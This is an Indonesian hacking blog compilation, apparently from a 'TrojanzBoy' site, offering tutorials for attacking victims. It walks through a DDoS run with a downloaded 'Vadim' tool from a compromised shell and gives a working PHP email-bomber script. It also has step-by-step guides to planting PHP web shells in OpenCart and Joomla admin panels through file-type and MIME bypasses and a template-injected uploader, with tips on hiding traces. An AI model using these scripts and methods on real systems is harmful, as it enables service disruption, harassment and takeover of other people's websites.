Silahkan dibaca dulu pengertian'y --> http://id.wikipedia.org/wiki/Serangan_DoS
Step yang dilakukan dalam melakukan serangan Ddos:
1. Connect ke korban (host, port).
2. Kirimkan paket data dalam jumlah besar.
3. koneksi terputus > selesai.
Sebenar'y masih banyak tekhnik DDOS ATTACK.
tapi Yang akan ane bahas disini adalah Ddos dengan menggunakan shell dengan VADIM Sebagai senjata untuk menyerang.
Langkah Pertama :
Download file Vadim :
https://dl.dropboxusercontent.com/s/lbsg33g6biotcl2/vadim%28trojanzboy.blogspot.com%29.tar.gz?token_hash=AAH2eADr9GPvED0b_fQYmEoFdo3MFNfWbzmQkx2qM2MGJg&dl=1
Langkah Kedua :
Upload Vadim yg dagh di donlot tadi ke Shell kalian. Kalo belum punya shell. silahkan minta ke temen.
Shell hrs dlm keadaan safemode Off, chmod'y permissionnya disetting 777 artinya kita mampu melakukan aksi baca, tulis dan eksekusi terhadap file tersebut.
Ekstrak file Vadim menggunakan perintah --> tar -zxvf vadim.tar.gz Klik go
Screenshoot'y kek gini :
Setelah di ekstrak, nanti akan tercipta sebuah folder nama folder'y --> [Dos]. Setelah itu Klik folder tersebut. Kita masuk ke directory dos
Langkah Keempat :
Setelah semua'y siap, ketik ini -->./vadimI [iptarget] [port] [jumlah paket]
Contoh : 180.223.161.11 80 9999999999999999999999 Klik go
Screenshoot :
Selanjut'y Klik go, and Kita tunggu hasil'y.
Cara mengetahui id Email Palsu
sangat penting untuk mengetahui / mendeteksi ID Email palsu karena hacker (baca : interuder ) biasanya menggunakan ID Email palsu untuk mendapatkan informasi pribadi korban.
Ada beberapa teknik untuk mengidentifikasi ID Email palsu seperti,
1. Kirim test mail ke ID tersebut.
2. Email Checker Alamat.
1. Alamat Email Checker.
http://tools.email-checker.com/
berikut contoh screenshotnya:
Semoga Bermanfaat
Selamat Sore ^_^ kali ini saya akan share script email bomber. Mungkin kalian semua udah pada ngerti apa yang dimaksud dengan email bomber :) iseng - iseng buat ngerjain teman fb atau buat brondong ke email korban hack fb juga bisa
Features :
- Bisa mengirimkan ratusan email bahkan ratusan email dalam hitungan menit
- Tidak ribet dan simpel
Cara Pasang :
- Pertama copy paste script berikut dalam notepad
<?php
//Copy Righted Waffles./scheols
$hackedemail = $_POST['emailhacked'];
if(isset($_POST['hack'])){
$hack = 1;
$user = "FUCKEN GOT HACKED ROTFL";
while($hack <= 100000000000){
mail($hackedemail,"Hacked","Fucken Got Pwned", "From: " ."TrojanzBoz. - ". $user. "<" . $hackedemail . ">\n");
echo "Hacked";
$hack++;
}
}elseif(!isset($_POST['hack'])){
?>
<form method='post'>
<input type='text' name='emailhacked'><br>
<input type='submit' name='hack' value='Hack Person'>
</form>
<? } ?>
- ganti tulisan warna merah sesuai jumlah email yang akan dikirim ke korban
- Setelah di copy paste simpan dalam jenis .php (Contoh : bomb.php)
- Setelah di simpan silahkan langsung di upload di hosting kalian dan nikmatilah ^_^
maka akan otomatis ngirim jutaan email ke email korban
disini saya harap kalian sudah punya akses login site admin
1. target kita www.targetopencart.com/admin. login dulu sebelumnya :
kalo udah masuk kita klik aja menu catalog ---> downloads
klik insert. nah...sebelum upload shell kita hrs rename shell kita dulu (shell.php.nomertoken)
nomer token bisa diliat di address barnya
jangan lupa kolom Download Name -nya dikasih nama terserah kalian.
kalo sudah tersimpan dan sukses klik edit file yang ada pada tabel download
maka akan muncul letak shell backdoor kita
dan panggil pada address bar
www.targetopencart.com/download/namashell.php.nomertoken.
JRRRRRREEEEEEENNNGGG....masuk kan shell kita.
kalo sudah tersimpan dan sukses klik edit file yang ada pada tabel download
maka akan muncul letak shell backdoor kita
dan panggil pada address bar
www.targetopencart.com/download/namashell.php.nomertoken.
JRRRRRREEEEEEENNNGGG....masuk kan shell kita.
JIKA SAJA file berekstensi .php tidak di izinkan untuk di upload maka kita harus menambahkan ekstensi php
caranya masuk system > setting lalu klik edit
tambahkan php pada Allowed File Extensions:
tambahkan pada Allowed File Mime Types: dengan text di bawah ini
text/php
text/x-php
application/php
application/x-php
application/x-httpd-php
application/x-httpd-php-source
setelah itu save
dan masuk ke menu catalog ---> downloads
klik insert.tapi sekarang shell.php nya direname menjadi .jpg agar bisa di edit nantinya dengan tamper data
tapi jangan di upload dulu kita masih membutuhkan tool tamper data
disini kita cuman mengubah/edit mime nya saja
caranya intall dulu add on mozilla tamper data
bisa di download di https://addons.mozilla.org/en-us/firefox/addon/tamper-data/
setelah di download install lalu restart mozillanya
setelah sukses install
buka tamper data pada menu mozilla klik tools lalu pilih tamper data dan masuk ke halaman upload tadi
aktifkan start tamper data
lalu upload
Lalu muncul dialog pilih tamper
lalu muncul editor pada popup tamper edit kolom di bagian kanan post data dan cari file shell.jpg anda rubah dengan php
disini nama shell saya becak.jpg akan saya ganti menjadi becak.php lalu klik ok
dan berhasil becak.jpg yang telah di ubah mime nya menjadi becak.php sukses di upload
dan sekarang cek letak shell nya bisa dilihat nomer token pada kolom upload disini keterangan pada kolom upload saya (token)
becak.php.0b0a14efc59b2b7c105d0678ff4da907
lalu muncul editor pada popup tamper edit kolom di bagian kanan post data dan cari file shell.jpg anda rubah dengan php
disini nama shell saya becak.jpg akan saya ganti menjadi becak.php lalu klik ok
di ubah menjadi .php
dan berhasil becak.jpg yang telah di ubah mime nya menjadi becak.php sukses di upload
dan sekarang cek letak shell nya bisa dilihat nomer token pada kolom upload disini keterangan pada kolom upload saya (token)
becak.php.0b0a14efc59b2b7c105d0678ff4da907
jangan lupa kolom Download Name -nya dikasih nama terserah kalian.
kalo sudah upload shellnya skrg kita buka aja di :
jadinya letak shel kita ada pada
www.targetopencart.com/download/namashell.php.nomertoken
JRRRRRREEEEEEENNNGGG....masuk kan shell kita.
kalo sudah upload shellnya skrg kita buka aja di :
jadinya letak shel kita ada pada
www.targetopencart.com/download/namashell.php.nomertoken
JRRRRRREEEEEEENNNGGG....masuk kan shell kita.
okedeh, langsung ke tutorialnya aja.
pertama, yang pasti udah dapet akses ke admin panel joomla nya. ane ga bahas gimana cara dapetin akses admin nya. entah SQLi, jumping, symlink, ,etc.
CARA 1
masuk ke menu site > global configuration. trus klik bagian system
trus di sub bagian
[+]Legal Extensions (File Types) kita tambahkan ekstensi php kedalamnya
[+]Restrict Uploads --> pilih NO
[+]Check MIME Types --> pilih NO
[+]Legal Image Extensions (File Types) kita tambahkan ekstensi php kedalamnya
[+]Legal MIME Types --> tambahin image/php
klo udah save. stelah itu..
pergi ke media manager (site > media manager) upload shellnya disitu.
udah ke upload :D , lokasi shell ada di http://korban.com/images/namashell.php
CARA 2
secara konsep sih sama, disni ane dpetnya joomla versi 1.5.18 , klo versi yg laen.. silakan menyesuaikan. :pKlik menu Extension > template manager
trus pergi di bagian administrator.
kemudian seleksi nama template admin yg aktif, trus klik edit. klo udah pilih lagi edit html.
kan udah muncul tuh editornya, tinggal kita sisipin aja uploader.
buat yg belom punya uploader, bisa di copy script di bawahmari kita sisipin uploadernya, taro dibawah </body> aja.<?php
echo '<b>TrojanzBoy uploader</b>';
echo '<b><br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES Dab!!!</b><br><br>'; }
else { echo '<b>JANCOOK !!! Upload GAGAL !!!</b><br><br>'; }
}
?>
sukses. dan uploader kita udah nongol dibawah :) tinggal kita upload shell kita.
setelah upload shell, kita coba akses shell kita. letak file yg udah di upload, itu ada di http://korban.com/administrator/namashell.php
*kalo ane : biasanya ane balikin lg template admin td ke semula, yg ga ada uploadernya. ane remove lg script uploadernya. biar ga ketauan.
:) CARA 3
masi dlm masalah edit mengedit template. kali ini kita pake cara edit template yg laen.kita ke extension > template manager. kali ini kita edit template site nya. tp bukan yg sedang dipakai. (klo yg template admin td kan nyari template yg lg aktif)
skrng kita pilih template site yg sedang tidak aktif. (tanda kalo template itu aktif, ada tanda bintangnya)
klik aja nama template yg ga aktif. misal: beez
trus pilih edit html. klo udah muncul editornya, langsung dah kita replace dengan script shell kita
klo udah silakan disave. nah.. skrng kita coba menuju shell kita.
letak posisi shell uda ane jelasin di gambar diatas. yaitu : http://korban.com/templates/beez/index.php
CARA 4
jika joomla compatibble dengan ninja xploler coba intall saja dengan cara masuk ke extension > instal/unintsal
setelah selesai intall lalu pilih components > ninja xplorer
setelah itu tentukan letak upload shellnya disini saya letakkan pada folder logs lalu klik upload
setelah itu eksekusi shellnya pada http://target.com/logs/namashell.php
sekarang kalian sudah take over webnya
tinggal ubah sesuai keinginan kalian
kalau tidak bisa karna joomla telah di update dari cms yang lama ke yang baru bisa gunakan cara ini
pertama masuk content > media manager > option
setelah itu tambahkan extension php pada legal extension , legal image extension
setelah itu save and exit
lalu cobalah upload shell backdoor anda
dan berhasil kita upload shell backdoor kita pada web
hmmhh.. baru segitu cara ane,
mari diskusi disini, cara cara yg laennya. yang punya trik laen (kalo mau sih) share juga dimari.
